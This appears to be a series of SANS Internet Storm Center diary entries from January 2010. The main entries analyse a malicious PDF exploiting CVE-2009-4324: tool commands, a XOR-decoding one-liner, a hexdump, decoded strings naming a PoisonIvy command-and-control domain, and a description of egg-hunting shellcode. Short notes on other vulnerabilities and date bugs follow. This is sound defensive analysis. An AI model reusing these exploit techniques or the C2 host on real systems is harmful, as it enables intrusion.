-rw-r----- 1 daniel handlers 952206 2010-01-03 23:57 Requset.pdf

One of the tools that work very well to analyze PDFs is Didier Stevens' excellent script "pdf-parser.py" . Running pdf-parser.py -f Requset.pdf | more nicely dissects the PDF into its portions, and also de-compresses packed sections. Almost at the end of the output, we encounter Object #44:

The code is included here as an image, to keep your anti-virus from panicking. The blue box marks the surprisingly short and efficient shell code block of only 38 bytes length that Bojan mentioned in his earlier diary. The red box marks the call to "media.newPlayer" with a null argument, which is a tell-tale sign of an exploit for CVE 2009-4324, the currently still unpatched Adobe vulnerability.

If all we wanted to know is whether this PDF is hostile, we can stop here: Yes, it is.

Taking a completely different tack on the same sample, a brute force method in analysis that often works, and also works in this case, is to check the sample for XOR encoded strings. XORSearch, another one of Didier Stevens' cool tools (URL) helps with this task. Let's check if the sample contains a XOR encoded representation of the string "http"

$ XORSearch Requset.pdf http

Found XOR 00 position E6340: http://www.w3.org/1999/02/22-rdf-syntax-ns#">.
Found XOR 00 position E63A9: http://ns.adobe.com/xap/1.0/">. <xmp:Modif
[...etc...]
Found XOR 85 position D870: http://www.w3.org/1999/02/22-rdf-syntax-ns#' xmlns
Found XOR 85 position D8A7: http://ns.adobe.com/iX/1.0/'>..<rdf:Description rd
Found XOR 85 position DAD4: http://ns.adobe.com/xap/1.0/mm/' xapMM:DocumentID=
Found XOR 85 position DB86: http://purl.org/dc/elements/1.1/' dc:format='appli
Found XOR 85 position 1054D: httpshellopencomMand.SoftwareMicrosoftActive

Well, a XOR with zero is not overly exciting, all this means is that the file contains these URLs in plain text. But a XOR with 85, and one that seems to be doing some sort of shell.open ... now that's intriguing. Let's simply XOR the entire PDF file with 0x85, and see what we get:

$cat Requset.pdf | perl -pe 's/(.)/chr(ord($1)^0x85)/ge' |strings | more

gfJV
w)pf
S>S2X4
[...etc...]
z<o*
7Fpo
!This program cannot be run in DOS mode.
L8Rich
M_*K
.text
`.rdata

Now lookie, it seems as if this PDF contains an embedded executable! And a bit further down in the de-xored file, we find

hepfixs.exe
baby
{38FC368D-A5D0-21DA-0404-080501030704}
cecon.flower-show.org
ws2_32
SOFTWAREClasseshttpshellopencomMand
SoftwareMicrosoftActive SetupInstalled Components

This gives us a potential domain name (cecon.flower-show. org), and also a ClassID. Searching for {38FC368D-A5D0-21DA-0404-080501030704} in Google, we find a recent ThreatExpert analysis http://www.threatexpert.com/report.aspx?md5=b0eeca383a7477ee689ec807b775ebbb that matches perfectly to what we found within this PDF.

Given the time later during my 24hr shift here at the ISC, I'll post another diary to take a look at other hostile PDF samples that we received.  If you got any interesting potentially hostile PDFs, please send them in!
 

Intevydis published a flash video on Monday showing what appears to be a new 0day exploit against MySQL 5.x. The demo (http://intevydis.com/mysql_demo.html ) is for a recent exploit included in their VulnDisco exploit pack for CANVAS as of Aug 2009. The demo shows as running against 5.0.51a-24+lenny2 but the description appears to be "MySQL 5.x Exploit" which suggests it may work against other versions as well. Current versions for MySQL are 5.1 (recommended) with a 5.5 release available.

If anyone has any additional details on this vulnerability we'd love to hear about it.

Just a quick note - Mozilla released Firefox 3.5.7 and 3.0.17 yesterday. Having looked through the patch list, it doesn't appear that there are any security issues though there are some stability fixes added.

Details can be found here:

Firefox 3.5.7: http://www.mozilla.com/firefox/3.5.7/releasenotes/
Firefox 3.0.17: http://www.mozilla.com/firefox/3.0.17/releasenotes/

Update

Our Handler Arrigo Triulzi pointed out that the "fixed memory content" that was mentioned in the paper is actually the encryption key used internally in these devices. Due to ease of manufacturing, this key is the same for all devices manufactured.

----

Several ISC readers have written in regarding a security flaw recently exposed on USB flash drive. The issue of the attack is with a software bug in the password verification mechanism. This affects Kingston, SanDisk and Verbatim.

Vendor Information

SanDisk Update Information: http://www.sandisk.com/business-solutions/enterprise/technical-support/security-bulletin-december-2009
Verbatim Update Information: http://www.verbatim.com/security/security-update.cfm
Kingston Recall Information: http://www.kingston.com/driveupdate/

UPDATE: An ISC reader has contacted Kingston support and confirmed they will be releasing a firmware patch to fix the issue. They have described it as a randomization error and it will affect some of the drives. Thanks Tony.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

I finally finished the report summarizing what we learned from yesterday's denial of service attack. Luckily it was small and easily defeated. The interesting part with attacks like this is to try to attribute them to a group or individual. In this case, my best guess is that this is an individual living in England. The individual appears to have some ties to Iran. Probably a student going to school in England.

The attack itself was rather simple, and required little skill. We got some great help from some of the administrators of the system attacking us. Most likely, the root cause was unprotected FTP accounts. These unprotected FTP accounts got used to upload a malicious ASP script, which was then used to attack our site. The script was very simple and had no "command and control" channel. Instead, it required a GET request hitting the specific URL to activate the attack.

The full report got a bit long for a diary, so I wrote it up as a PDF for download. I know... yet another PDF ;-).

Link to the PDF: http://isc.sans.org/presentations/jan4ddos.pdf

To make you feel better, here the checksums:

md5: 8eb9d6ef20c05875688d97fd3192a7e9
sha1: c097c740669869349bb5f8a3d3447ffa0376f928
ripemd160: 227feacd529de68c0634e1b5ca574d55cacf31ef

GPG signature:

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)

iEYEABEDAAYFAktEDmIACgkQPNuXYcm/v/3qzQCfRLKM64UiiWgWp0QDEomX1VAE
/gsAn2Dxst/Pe8kYsNz+QCmSZng+yRNj
=Or18
-----END PGP SIGNATURE-----
 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Garrett pointed us at this blog post: http://seattlewireless.net/~casey/?p=13 which discusses an interesting.... feature of the Kodack EasyShare Wireless Picture Frames. The frames use a site called FrameChannel to read an RSS feed consisting of anything you would like which is pulled down and then displayed. The catch is that the feeds are public and easily discoverable. At this point, when I looked through a handful of possible feeds it appears that they have nothing but the default images available, which suggests that it may have been taken offline at least for the moment. The comments for the post include a lovely example script for bruteforcing all possible URLs for the frames.

We've had a report (thanks Tom!) of a java applet exploiting CVE-2008-5353 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353) as part of a web drive-by attack. While PoC has been around for a long time for this, this is the first time I've heard of it being used in the wild for a general attack. If anyone else has seen this, we'd be interested to hear about it.

The applet is already being detected by some A/V packages according to VirusTotal: https://www.virustotal.com/analisis/d4f5bcc9acecb2f53a78313fc073563de9fc4f7045dd8123a23a08f926a3974d-1262270360

As we get more details on what it does, we'll update this entry with it.

UPDATE: Minnie Mouse was kind enough to write and let us know that exploits for this vuln apparently are available and included in the LuckySploit, Liberty and Fragus kits. In at least one case the exploit was a recent addition

We are curious whether anyone else is seeing the sorts of issues like the one with Symantec we just reported. Have you seen problems with the change from 200* to 20**?

UPDATE: Johannes mentioned that DShield actually had problems due to a regex on incoming logs looking for 200[0-9], to prevent ridiculously future dates being sent in. He ended up fixing it early in the morning on Jan 1.  Anyone else have stories to share?

UPDATE: We've had two interesting issues pointed out.

• The default cookie expiration in the Cisco CSM load balancer is set to 01/01/2010 so apps were being continuously rebalanced instead of getting a persistent connection
• German customers of Postbank are having problems getting cash out of ATMs due to a problem with the software running them handling 2010 dates: http://www.h-online.com/security/news/item/Problems-obtaining-cash-from-German-ATMs-Update-894801.html

Thanks to Derek to pointed us at this post from Symantec: http://www.symantec.com/connect/forums/official-status-sepm-definitions-stay-31-12-2009-last-updated-04-jan-2010 stating that Symantec Endpoint Protection Manager considers any definition update with a date newer than 11:59PM December 31 2009 will be considered out of date. They say they are working on a fix but are currently handling this by releasing new definitions with higher version numbers but the same date.

This is impacting:

• Symantec Endpoint Protection v11.x Product Line
• Symantec Endpoint Protection Small Business Edition v12.x Product Line

Couple of days ago one of our readers, Ric, submitted a suspicious PDF document to us. As you know, malicious PDF documents are not rare these days, especially when the exploit for a yet unpatched vulnerability is wide spread.

Quick analysis of the document confirmed that it is exploiting this vulnerability (CVE-2009-4324 – the doc.media.newPlayer vulnerability). This can be easily seen in the included JavaScript in the PDF document, despite horrible detection (only 6 out of 40 AV vendors detected this when I initially submitted it here).

After extracting the included JavaScript code, the shellcode that it uses looked quite a bit different than what we can usually see in such exploits: this shellcode was only 38 bytes long! Initially I even thought that it does not work, but after studying it a little bit, I found that this particular PDF document has some very interesting, sophisticated characteristics.

The exploit for this vulnerability is similar to most other exploits: it uses heap spraying in order to redirect the execution to shellcode. The NOP sled in this case actually consists of SBB AL,0x1C and SBB AL,0x0C instructions which do nothing (SBB is Subtract with borrow, from the register AL, so it keeps subtracting two values until it reaches the shellcode). The 38 bytes shellcode can be seen below:

Now comes the interesting part. This is an egg-hunting shellcode: it starts at the memory address ((0x02020200 OR 0xFF) + 0x01) = 0x02020300) and compares content of every 4 bytes with 0x58905090. You can see that initially the attacker moves 0x5890508F into the EAX register, which then gets increased by one – this was probably done to evade detection.

This pattern (0x58905090) corresponds to instructions POP EAX, NOP, PUSH EAX, NOP. Now, once this pattern has been identified in memory, the egg-hunting shellcode passes execution to this, second stage shellcode.

What is interesting about this approach is that the second stage shellcode is included as a different object in the PDF document. While the object is marked as a color object and its contents are inflated, it looks as if it is corrupted: it does not contain any inflated streams. You can see the object and the deflation error printed by pdf-parser, an excellent tool by Didier Stevens whom I wish to thank for useful discussion while I was analyzing this malicious PDF document:

$ pdf-parser.py --object 3 --raw --filter Requset.pdf

obj 3 0
 Type:
 Referencing:
 Contains stream
<</BitsPerComponent 8/ColorSpace/DeviceRGB/Filter/FlateDecode/Height 90/Length 13136/Subtype/Image/Width 60>>

 <<
   /BitsPerComponent 8
   /ColorSpace /DeviceRGB
   /Filter /FlateDecode
   /Height 90
   /Length 13136
   /Subtype /Image
   /Width 60
 >>

 FlateDecode decompress failed

The fact that the decompression fails does not matter – Adobe Reader will open the whole document (mmap it) into memory, including this "corrupted" object so the first stage shellcode will be able to find it and pass execution to it!

The advantage for the attacker is obvious: first, he can modify this object (what the exploit actually does) without having to modify the first stage shellcode. Additionally, this will make automatic analysis impossible for any tool that will use a JavaScript interpreter on the included JavaScript code (such as Wepawet) – the first phase shellcode will work only if the document is loaded in the memory. Sneaky, but that was not all!

The second stage shellcode does something interesting as well. It parses the document name from the command line arguments and opens the PDF document directly. The reason for this is that the PDF document carries two embedded binaries! The first binary (SUCHOST.EXE, b0eeca383a7477ee689ec807b775ebbb) contains a PoisonIvy client which tries to connect to the host cecon.flower-show.org which was down when I analyzed the document. Luckily, this binary has a bit better (but still not good, some major AV vendors missing it!) detection on VT (here). This binary is embedded in the PDF document – we can see it at offset 0x0e65c:

$ hexdump -C -v ../Requset.pdf |less
00000000  25 50 44 46 2d 31 2e 36  0d 25 e2 e3 cf d3 0d 0a  |%PDF-1.6.%......|
00000010  32 34 20 30 20 6f 62 6a  0d 3c 3c 2f 4c 69 6e 65  |24 0 obj.<</Line|
00000020  61 72 69 7a 65 64 20 31  2f 4c 20 39 34 37 32 33  |arized 1/L 94723|
00000030  32 2f 4f 20 32 36 2f 45  20 31 37 38 31 2f 4e 20  |2/O 26/E 1781/N |
...
0000e650  b4 b4 b3 88 8f a0 a0 c0  ca c3 88 8f c8 df 00 00  |................|
0000e660  84 00 00 00 87 00 00 00  7a 7a 00 00 c5 00 00 00  |........zz......|
0000e670  00 00 00 00 c5 00 00 00  00 84 00 00 8b 9a 31 8c  |..............1.|

The binary is XORed with value of 0x85 so the first two highlighted bytes are actually MZ, which is where the executable starts.

The second binary (temp.exe, 980e40cacbc9f898bc08cb453fa2d6bb) was even more surprising. This binary drops a benign PDF document on the machine, called baby.pdf. This PDF document is then opened with Adobe Reader – it just shows a table and, according to the metadata in the document, has been built from an Excel document. This was done by the attackers to make the victim believe as if nothing happened, because the original exploit will crash Adobe Reader and this might make the victim suspicious about what happened.

Additionally, the PDF document contains everything it needs to fully exploit the victim's machine – it does not have to download anything off the net.

Lessons learned

Not only was this a very interesting example of a malicious PDF document carrying a sophisticated "war head", but it also showed the length attackers are willing to go to in order to make their malware as hard to detect as possible, not only for the AV vendors, but also for victims.

Since this exploit has not been patched yet, I would like to urge you all to, at least, disable JavaScript in your Adobe Reader applications. We are getting more reports about PDF documents exploiting this vulnerability, and it certainly appears that the attackers are willing to customize them to get as many victims to open them as possible. Also keep in mind that such malicious PDF documents can go to a great length when used in targeted attacks – the fake PDF that gets opened can easily fool any user into thinking it was just a mistakenly sent document.

If we are to judge the new year by sophistication the attackers started using, it does not look too good.

--

Bojan
INFIGO IS

The WASC (Web Application Security Consortium) has just released the second version of their Threat Classification document. It contains a list of all the classes of attacks and weaknesses they have identified as being relevant to web applications. Personally, I like using it to supplement developer education materials but there are a number of ways you can use it (they suggest a few here: http://projects.webappsec.org/Using-the-Threat-Classification)

I wholeheartedly encourage y'all to check it out:

http://projects.webappsec.org/Threat-Classification

http://projects.webappsec.org/Threat-Classification-FAQ

As many of our long-time readers are aware, the SANS Internet Storm Center evolved from an initiative launched by the SANS Institute in December 1999 in support of the US government's concern that hackers might take advantage of the Y2K rollover confusion by launching attacks against critical systems while system administrators were tied up solving Y2K date problems.  Since we are now over ten years old I thought I would dig up some of the old web pages and archived files, then post this diary to tell a bit of the story.  I hope you enjoy the trip down memory lane!

Here is the text of a letter sent to the SANS community by Stephen Northcutt that got everything started:

From: The SANS Institute <sans@sans.org>
Sent: Mon, 20 Dec 1999 7:52 PM
Subject: SANS Flash:  Y2K Real-time Info Center

SANS Flash Advisory:
      SANS and the National Y2K Information Coordination Center (ICC) Request Your Assistance on Intrusion Detection Over The Next Two Weeks

Hello, I am Stephen Northcutt, Intrusion Detection Program Manager for SANS. I am writing to request your help.

Several of us recently learned that we will not be spending New Year's Eve at parties (as, I expect, many of you won't). Instead, several SANS Institute faculty members and additional analysts will be cooperating to analyze network traces in support of the cyber assurance cell of the US Government's National Y2K Information Coordination Center in Washington, D.C.  The success of this program depends heavily on the active participation of the entire community.

SANS's role is to isolate network traffic traces that represent attacks, find the malicious code, and get the word out to people who can block it -- all in real time. It was our community's work in stopping the RingZero traffic that led the government to request this assistance from the SANS community.

I'm writing you this week since December 24th usually marks the peak of hacker activity over the holidays.

We can't do this without your help.  We are asking that you let us know about any intruder-type traffic that you see any time from now through January 5, 2000. Please help by sending suspicious network and log files to <intrusion@sans.org>.

We will be establishing a web page (http://www.sans.org/y2k.htm) and have established real-time e-mail notification list for those who will be on duty during the rollover.  If you prefer frequent e-mail updates about newly observed security problems to checking the web page(s), send an empty mail message to <y2k@sans.org> and you will be added to the mailing list (whose names will be destroyed on January 5, 2000).  A reply to your request will be issued instantly if the list-add is successful.

                    SN

The Global Incident Analysis Center (GIAC) was launched the next day on December 21, 1999.  The original GIAC pages and the Y2K effort are no longer available on SANS' website, but thanks to the good people at the Internet Archive, we can still see what was going on back then.  Unfortunately there are no archived pages of the GIAC from December 1999.  Here is what GIAC looked like early in 2000:

http://web.archive.org/web/20000229194646/www.sans.org/giac.htm

Here are the archives of the Y2K project:

http://web.archive.org/web/20000617031044/www.sans.org/y2k/archive.htm

Here is an archive of Stephen Northcutt's appeal to readers in the letter above, but with more information about what SANS planned to do:

http://web.archive.org/web/20000229190330/www.sans.org/newlook/resources/flashadv.htm

And for those of use who were manning other watches at the time (I was on duty at the JTF-CND then, and stood watch on the shift that went from 6 PM on December 31st to 6 AM on January 1st) who could forget the "Stutzmann Report" that was issued daily by Jeff Stutzmann?

http://web.archive.org/web/20000302153045/www.sans.org/y2k/stutzman1221-0103.htm

In 2001 the initials "GIAC" were adopted by the SANS Global Information Assurance Certification program and "incidents.org" was spun off as the site where analysis of threats and events could be found.  Here is the note on the GIAC website notifying everybody that we were moving to incidents.org:

http://web.archive.org/web/20010603222806/www.sans.org/current.htm

Here is the original incidents.org web site:

http://web.archive.org/web/20010331043037/http://www.incidents.org/

Within a few weeks, incidents.org got its legs and the new website began to take on a more complete look:

http://web.archive.org/web/20010516020735/http://www.incidents.org/

As a result of the work done on the Li0n worm, the term "Internet Storm Watch" was chosen as the name of the all-volunteer service that SANS was running.  It was later changed to "Internet Storm Center" which is what has been in use since then.  If you poke around some of those archived pages you'll see an occasional reference to the Internet Storm Watch.  Eventually we started using "isc.sans.org" as our URL rather than "incidents.org".  Here's what we looked like then:

http://web.archive.org/web/20030106080128/http://isc.sans.org/

Since its inception as GIAC and then later as incidents.org we've been using the "diary" format to report on what we've been seeing and analyzing (we don't write blogs, we write diaries!)  Near the end of 2003 we started the Handler of the Day (HOD) concept where each of the volunteer handlers would take 24-hour shifts, changing at 0000UTC each day.  Our handlers live all around the world, which means that 24 hours a day one of them is awake and watching for emerging Internet security events.  While only one handler at a time is the HOD, each of us can create a diary entry anytime we see something unusual happening.  We maintain our own private chat room where we can coordinate things behind the scenes, and we have an internal set of web pages where we sign up for HOD shifts, keep contact information, have our own set of FAQs, etc. 

Two other projects happening back in the early days were the Consensus Incident Database (CID) and the Intrusion Detection FAQs.  The CID was an effort to bring together logs from lots of sensors around the world so that analysts could correlate events happening beyond their own firewalls.  Here is an FAQ page that explained the project:

http://web.archive.org/web/20010410171508/www.incidents.org/cid/faq.php

Johannes Ullrich's DShield project merged with this effort in 2001, here is an early archive of dshield.org:

http://web.archive.org/web/20010127053100/http://dshield.org/index.html

The IDFAQ project attempted to provide a one-stop location of everything you ever wanted to know about detecting intrusions.  While a bit dated, the old FAQ site still has lots of useful information:

http://web.archive.org/web/20000301050342/www.sans.org/newlook/resources/IDFAQ/ID_FAQ.htm

I hope this bit of history will help explain where we came from and what was going on in the early years.  Since 2003 we've been maintaining an archive of all of our diaries so it's a bit easier now to go back and recreate what was happening in previous years.

I must say that the 35 or so volunteer handlers we have are some of the best on the planet, and we are supported by hundreds of loyal readers and people who continue to submit their own analysis of things they are seeing around the Internet.  While the threats and vulnerabilities have changed a lot over the past ten years, the cooperative spirit behind the SANS Internet Storm Center has remained steady and strong.  Thanks to all who support this effort, and we are all looking forward to continuing the collaboration in the new decade.

Marcus H. Sachs
Director, SANS Internet Storm Center

Karl sent us a note about date parsing issues in Spamassassin.  I thought we fixed all of these problems ten years ago when we went through the Y2K transition.  Apparently not.  More details are at these URLs:

http://www.arrfab.net/blog/?p=174
https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6269
http://svn.apache.org/viewvc/spamassassin/trunk/rulesrc/sandbox/emailed/00_FVGT_File001.cf?r1=794319&r2=796216&diff_format=h

Thanks for the info Karl!

Marcus H. Sachs
Director, SANS Internet Storm Center

A common question I get from individuals who use Internet-accessible SSH
to manage their network devices concerns how do deal with all the unwanted
Bruteforcing activity that is usually attracted.

While changing the default SSH listening port number and/or implementing a
Source-IP based Access Control List would seem like common sense solutions,
there are still situations where it is either not possible to move the SSH
listening port or not practical to implement an Access Control List if the
application involves providing access from dynamic Internet address space.

I recently became aware of an interesting initiative at http://www.sshbl.org
where a collection of SSH Bruteforcing attempts by source IP is being maintained.

The next step (of course) was to solicit logs from a few colleagues who monitor
and deal with this nefarious activity, and it was quite amazing to see a significant
amount of overlap with the sshbl.org statistics.

A final step of experimenting with an Access Control List to block SSH activity from
the sshbl.org SSH bruteforce IP list is still in the works, but will nevertheless be
an interesting exercise.

Do you have a favourite source of statistics regarding SSH Bruteforcing activity?
If there's enough interest, I'll post a summary at the end of my shift.

Best wishes for 2010 to all our readers!

G.N. White
Handler on Duty